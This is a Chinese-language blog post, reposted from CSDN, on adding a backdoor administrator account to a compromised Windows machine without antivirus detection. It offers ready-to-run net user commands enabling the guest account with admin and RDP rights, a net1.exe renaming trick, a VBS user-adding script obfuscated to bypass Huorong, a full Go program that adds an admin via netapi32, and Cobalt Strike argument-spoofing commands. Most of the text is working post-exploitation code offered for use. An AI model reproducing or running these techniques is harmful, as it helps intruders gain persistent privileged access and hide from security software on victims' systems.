方法0、直接运行神器
360shellcode.zip
github可搜
方法1、激活GUEST用户
比较好用,试过很多次杀软都不拦截
net user guest /active:yes
net user guest Aa123456.
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
方法2、net1绕过
net1.exe在C:/windows/system32下
进入到目录下面,此时生成一个asd.txt
此时的asd.txt就和net 一样了,可以执行net user
不会触发火绒告警(有的主机会有的主机不会不知道为啥)
方法3、VBS API脚本
wscript.exe add.vbs 无法绕过火绒(会被当做adduser病毒干掉)
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/admin"
但是我们只要简单的尝试混淆即可绕过
Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"
方法4、使用windows底层API
原理是使用windows本地的netapi32.dll来绕过杀软的监测
package main
import (
"fmt"
"os"
"syscall"
"unsafe"
)
//参考如下
//https://docs.microsoft.com/zh-cn/windows/win32/api/lmaccess/nf-lmaccess-netuseradd/
//https://github.com/CodyGuo/xcgui/blob/master/doc/cToGo.go
//https://github.com/iamacarpet/go-win64api/blob/master/users.go
//https://git.itch.ovh/itchio/ox/-/blob/ec75be15423d72ab9691a3318ecce3feee67b19b/syscallex/netapi32_windows.go
//https://pkg.go.dev/github.com/itchio/ox/syscallex#NetUserAdd
type USER_INFO_1 struct {
Usri1_name *uint16
Usri1_password *uint16
Usri1_password_age uint32 //可忽略
Usri1_priv uint32
Usri1_home_dir *uint16
Usri1_comment *uint16
Usri1_flags uint32
Usri1_script_path *uint16
}
type LOCALGROUP_MEMBERS_INFO_3 struct {
Lgrmi3_domainandname *uint16
}
const (
USER_PRIV_GUEST = 0
USER_PRIV_USER = 1
USER_PRIV_ADMIN = 2
USER_UF_SCRIPT = 1
USER_UF_NORMAL_ACCOUNT = 512
USER_UF_DONT_EXPIRE_PASSWD = 65536
//parmErr = 0
NET_API_STATUS_NERR_Success = 0
)
type User struct {
username string
password string
}
func main() {
// 请更改此处用户名密码
info := User{
username: "test",
password: "123456",
}
r, err := NetUserAdd(info.username, info.password)
if err != nil {
fmt.Println(err)
}
fmt.Println(r)
//if r == true {
// _, err := AddLocalGroup("test", "Administrators")
// if err != nil {
// fmt.Println(err)
// }
//}
}
func NetUserAdd(user string, pass string) (bool, error) {
var parmErr uint32
parmErr = uint32(0)
username := UtfToStr(user)
password := UtfToStr(pass)
userinfo := USER_INFO_1{
Usri1_name: username,
Usri1_password: password,
Usri1_priv: USER_PRIV_USER,
Usri1_flags: USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD,
//Usri1_home_dir: UtfToStr(""),
//Usri1_comment: UtfToStr("test测试用户"),
//Usri1_script_path: UtfToStr(""),
}
netapi, err := syscall.LoadLibrary("netapi32.dll")
if err != nil {
panic("dll引用失败")
}
AddUser, err := syscall.GetProcAddress(netapi, "NetUserAdd")
result, _, _ := syscall.Syscall6(AddUser,
4,
uintptr(0), //server
uintptr(uint32(1)), //lever
uintptr(unsafe.Pointer(&userinfo)),
uintptr(unsafe.Pointer(&parmErr)), 0, 0,
)
//令必须使用管理员权限才能添加用户
if result != NET_API_STATUS_NERR_Success {
return false, fmt.Errorf("添加失败")
} else {
_, err = AddLocalGroup(user, "Administrators", netapi)
if err != nil {
fmt.Println(err)
}
return true, fmt.Errorf("添加成功%s:%s", user, pass)
}
}
func AddLocalGroup(user, group string, netapi syscall.Handle) (bool, error) {
work, _ := os.Hostname()
WorkStation := UtfToStr(work + `\` + user)
GroupName := UtfToStr(group)
var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1)
uArray[0] = LOCALGROUP_MEMBERS_INFO_3{
Lgrmi3_domainandname: WorkStation,
}
ALG, _ := syscall.GetProcAddress(netapi, "NetLocalGroupAddMembers")
result, _, _ := syscall.Syscall6(ALG, 5,
uintptr(0), // servername
uintptr(unsafe.Pointer(GroupName)), // group name
uintptr(uint32(3)), // level
uintptr(unsafe.Pointer(&uArray[0])), // user array.
uintptr(uint32(len(uArray))), 0)
if result != NET_API_STATUS_NERR_Success {
return false, fmt.Errorf("添加管理组失败")
} else {
return true, fmt.Errorf("添加管理组Administrators成功")
}
}
func UtfToStr(str string) *uint16 {
res, err := syscall.UTF16PtrFromString(str)
if err != nil {
panic(err)
}
return res
}
方法5、利用CS argue参数欺骗
beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass
beacon> run net1 user betasec 3had0w!@#123 /add
beacon> run net1 localgroup administrators betasec /add
argue 进程参数欺骗
argue [command] [fake arguments]
argue 命令 假参数 欺骗某个命令参数
argue [command]
argue 命令 取消欺骗某个命令参数
本文转载自: https://blog.csdn.net/weixin_63124284/article/details/127979977
版权归原作者 恸.283 所有, 如有侵权,请联系我们删除。
版权归原作者 恸.283 所有, 如有侵权,请联系我们删除。